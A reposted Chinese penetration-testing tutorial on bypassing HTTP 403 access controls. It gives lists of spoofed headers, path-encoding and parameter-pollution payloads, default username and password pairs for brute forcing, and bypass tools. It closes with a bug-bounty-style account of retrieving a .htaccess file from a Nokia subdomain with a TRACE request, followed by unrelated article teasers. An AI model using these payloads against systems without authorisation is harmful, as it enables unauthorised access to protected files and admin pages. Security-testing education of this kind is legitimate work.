完整教程:渗透技巧403绕过

news/2025/10/1 16:29:38/文章来源:https://www.cnblogs.com/wzzkaifa/p/19122524

渗透技巧403绕过

    • 403页面绕过技巧(先分享技巧和工具,后面分享实战报告)
      • 1.什么是403?
      • 什么是403绕过?
      • 2.HTTP 请求方法fuzz
      • 3.HTTP 标头fuzz
      • 4.路径fuzz
        • 其他路径绕过:
    • 更换协议版本
    • 暴力破解
    • 自动化工具使用
    • 实战报告分析
      • 绕过

403页面绕过技巧(先分享技巧和工具,后面分享实战报告)

1.什么是403?

作为普通用户,我们没有访问特定网页的权限(只能管理员等访问),所以当我们尝试访问该类型的网站时,它会给我们返回 403 forbidden。

什么是403绕过?

绕过 403 Forbidden Error 表示客户端能够与服务器通信,但服务器不允许客户端访问所请求的内容。

2.HTTP 请求方法fuzz

尝试使用不同的请求方法来访问:GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK

3.HTTP 标头fuzz

X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
X-Original-URL: 127.0.0.1
Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Cluster-Client-IP: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
Host: localhost

如果路径受到保护,您可以尝试使用这些其他标头绕过路径保护:

X-Original-URL: /admin/console
X-Rewrite-URL: /admin/console

4.路径fuzz

  1. 尝试使用 /%2e/path (如果访问被代理阻止,这可能会绕过保护),也可以试试** /%252e**/path(双 URL 编码)
  2. 尝试 Unicode 绕过:/%ef%bc%8fpath
其他路径绕过:
site.com/secret –> HTTP 403 Forbidden
site.com/SECRET –> HTTP 200 OK
site.com/secret/ –> HTTP 200 OK
site.com/secret/. –> HTTP 200 OK
site.com//secret// –> HTTP 200 OK
site.com/./secret/.. –> HTTP 200 OK
site.com/;/secret –> HTTP 200 OK
site.com/.;/secret –> HTTP 200 OK
site.com//;//secret –> HTTP 200 OK
site.com/secret.json –> HTTP 200 OK

其他api绕过

/v3/users_data/1234 --> 403 Forbidden
/v1/users_data/1234 --> 200 OK
{“id”:111} --> 401 Unauthriozied
{“id”:[111]} --> 200 OK
{“id”:111} --> 401 Unauthriozied
{“id”:{“id”:111}} --> 200 OK
{"user_id":"","user_id":""} (JSON 参数污染)
user_id=ATTACKER_ID&user_id=VICTIM_ID (参数污染)

更换协议版本

如果使用 HTTP/1.1,请尝试使用 1.0,或者测试看它是否支持 2.0。

暴力破解

admin    admin
admin    password
admin    1234
admin    admin1234
admin    123456
root     toor
test     test
guest    guest

自动化工具使用

  1. https://github.com/lobuhi/byp4xx
  2. https://github.com/iamj0ker/bypass-403
  3. https://github.com/gotr00t0day/forbiddenpass
  4. Burp扩展:https://portswigger.net/bappstore/444407b96d9c4de0adb7aed89e826122

实战报告分析

首先我们的目标是一个类似https://subs.nokia.com的网站

image

首先,我检查网站是否包含隐藏目录,所以我尝试 https://subdomain.nokia.com/.htaccess ,它返回了 403 错误而不是 404 ,这意味着 .htaccess 文件存在于该子域中。

https://subs.nokia.com/.htaccess

image

绕过

接下来怎么绕过,包括上面讲解的方法和工具都可以尝试
尝试更改请求方法绕过
如GET → POST、GET → TRACE等。
Burp-Suite抓包并拦截,尝试post绕过失败,trace绕过直接成功

image

成功绕过,.htaccess 文件弹出并给我下载权限。

image

这就是全部

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/924017.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

公民科学研究奖项众人智慧表彰技术创新项目

公民科学研究奖项众人智慧表彰技术创新项目

2025年"众人智慧"研究奖表彰了三个杰出的公民科学项目,包括利用3D打印技术开发儿童假肢、构建人机交互研究平台以及研究桦树生态系统的生物多样性,展示了公众参与科学研究的创新成果。公民科学研究奖项&qu…
阅读更多...
深入解析:@xyflow/react:构建交互式节点流程图的完整指南

深入解析:@xyflow/react:构建交互式节点流程图的完整指南

深入解析:@xyflow/react:构建交互式节点流程图的完整指南2025-10-01 16:25 tlnshuju 阅读(0) 评论(0) 收藏 举报pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !importan…
阅读更多...
南昌网站搭建软文优化

南昌网站搭建软文优化

二叉树OJ面试题 1. 对称二叉树2.二叉树的构建及遍历3.二叉树的层序遍历4.给定一个二叉树, 找到该树中两个指定节点的最近公共祖先5. 二叉树创建字符串用栈来存放路径上的节点 1. 对称二叉树 思路: 在根的值一样接着往下判断判断左树的左子树的值和右树的右子树的值…
阅读更多...
临沂企业建站系统模板网络推广赚钱平台

临沂企业建站系统模板网络推广赚钱平台

目录 前言: Linux的目录结构 Linux常用指令简介 whoami指令 ls指令 pwd指令 cd指令 tree指令 touch指令 mkdir指令 rmdir指令与rm指令 man指令 cp(copy)指令 mv(move)指令 cat指令 重定向及重定向的类型…
阅读更多...
杭州专业网站建设wordpress 流程

杭州专业网站建设wordpress 流程

STL中的序列式容器主要包括 vector 向量容器、list 列表容器以及 deque 双端队列容器。 vector 实现的是一个动态数组。 定义在 <vector> 头文件中。 #include <iostream> #include <vector> using namespace std; int main() {//初始化一个空vectorvecto…
阅读更多...
网站建设的目标是网站内容建设和运营工作

网站建设的目标是网站内容建设和运营工作

文章目录 概念结构实例总结 概念 观察者模式&#xff1a;定义对象之间的一种一对多的依赖关系&#xff0c;使得每当一个对象状态发生改变时&#xff0c;其他相关依赖对象都得到通知并被自动更新。 观察者模式是使用频率较高的一个模式&#xff0c;它建立了对象与对象之间的依赖…
阅读更多...
1数学建模模型分类

1数学建模模型分类

数学建模模型分类核心笔记 一、预测类模型 1. 定义 基于历史数据或已知现象,挖掘内在发展规律,对未来趋势或样本内未知属性进行推断的模型类型,核心是“数据驱动+规律推导”。 2. 关键分类(按数据量与预测范围)样…
阅读更多...
网站建设昆山网站研发流程

网站建设昆山网站研发流程

1.1web基本 session 和 cookie 有什么区别&#xff1f; 存储位置不同&#xff1a;session 存储在服务器端&#xff1b;cookie 存储在浏览器端。 安全性不同&#xff1a;cookie 安全性一般&#xff0c;在浏览器存储&#xff0c;可以被伪造和修改。 容量和个数限制&#xff1a;…
阅读更多...
企业网站 阿里云asp网站应用程序

企业网站 阿里云asp网站应用程序

1、符号运算符 ( ) [ ] . -> 圆括号 数组 成员选择&#xff08;对象&#xff09;——结构体、联合体 成员选择&#xff08;指针&#xff09;——结构体、联合体 2、符号运算符 - () -- * & …
阅读更多...
企业做网站需要什么资料爱战网关键词挖掘

企业做网站需要什么资料爱战网关键词挖掘

文章目录 服务端通过传入命令处理实现远程命令执行使用Windows编辑UDP客户端实现Windows远程控制Linux接收套接字的其他信息UDP套接字简单群聊服务端UDP套接字简单群聊客户端运行测试及分离输入输出 参考代码 服务端通过传入命令处理实现远程命令执行 『 Linux 』利用UDP套接字…
阅读更多...
数学每日?题

数学每日?题

遇到一些比较好的题会进行收录。范围:我会的知识点。已知二次函数 \(f(x)=ax^2+bx+c(b>a)\) 满足 \(\forall x \in \mathbb{R}, f(x) \ge 0\) 恒成立,求 \(\dfrac{b - a}{a + b + c}\) 的最大值。 已知的条件如下…
阅读更多...
OpenSpeedy最新版下载,夸克百度网盘加速提速|游戏加速工具|官网入口

OpenSpeedy最新版下载,夸克百度网盘加速提速|游戏加速工具|官网入口

OpenSpeedy 是一款面向 Windows 平台的开源免费游戏变速工具,旨在通过修改游戏进程的时间函数实现加速或减速,从而突破原生帧率限制、提升单机游戏流畅度,甚至在部分情况下加速网盘下载。软件采用 Ring3 层 Hook 技…
阅读更多...
详细介绍:深入理解 SPI:从定义到 Spring Boot 实践

详细介绍:深入理解 SPI:从定义到 Spring Boot 实践

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …
阅读更多...
详细介绍:深入理解 SPI:从定义到 Spring Boot 实践

详细介绍:深入理解 SPI:从定义到 Spring Boot 实践

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …
阅读更多...
RVC WebUI(Retrieval-based-Voice-Conversion-WebUI)配置 - 实践

RVC WebUI(Retrieval-based-Voice-Conversion-WebUI)配置 - 实践

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …
阅读更多...
有哪些网站可以做h5莱芜十大首富

有哪些网站可以做h5莱芜十大首富

原标题&#xff1a;从安卓换到苹果到底是什么感受&#xff1f;最后一个让我彻底放弃了iPhone&#xff01;iPhone X是近几年来苹果最具创新力的iPhone&#xff0c;然而高昂的售价让很多消费者望而却步。随着今年苹果秋季新品发布会的临近&#xff0c;苹果即将发布价格更低廉&…
阅读更多...
个人资料库网站怎么做资源下载类网站源码

个人资料库网站怎么做资源下载类网站源码

Java 中的并发包指的是 java.util.concurrent(简称 JUC)包和其子包下的类和接口,它为 Java 的并发提供了各种功能支持,比如: 提供了线程池的创建类 ThreadPoolExecutor、Executors 等;提供了各种锁,如 Lock、ReentrantLock 等;提供了各种线程安全的数据结构,如 Concur…
阅读更多...
第一次软工作业

第一次软工作业

这个作业属于哪个课程 https://edu.cnblogs.com/campus/fzu/202501SoftwareEngineering这个作业要求在哪里 https://edu.cnblogs.com/campus/fzu/202501SoftwareEngineering/homework/13546这个作业的目标 自我介绍,初…
阅读更多...
Nginx核心配备详解:访问控制、用户认证与HTTPS部署

Nginx核心配备详解:访问控制、用户认证与HTTPS部署

Nginx核心配备详解:访问控制、用户认证与HTTPS部署pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas"…
阅读更多...
深入解析:5. Prompt 提示词

深入解析:5. Prompt 提示词

深入解析:5. Prompt 提示词2025-10-01 15:59 tlnshuju 阅读(0) 评论(0) 收藏 举报pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important;…
阅读更多...
最新文章

Copyright @ 2022~2023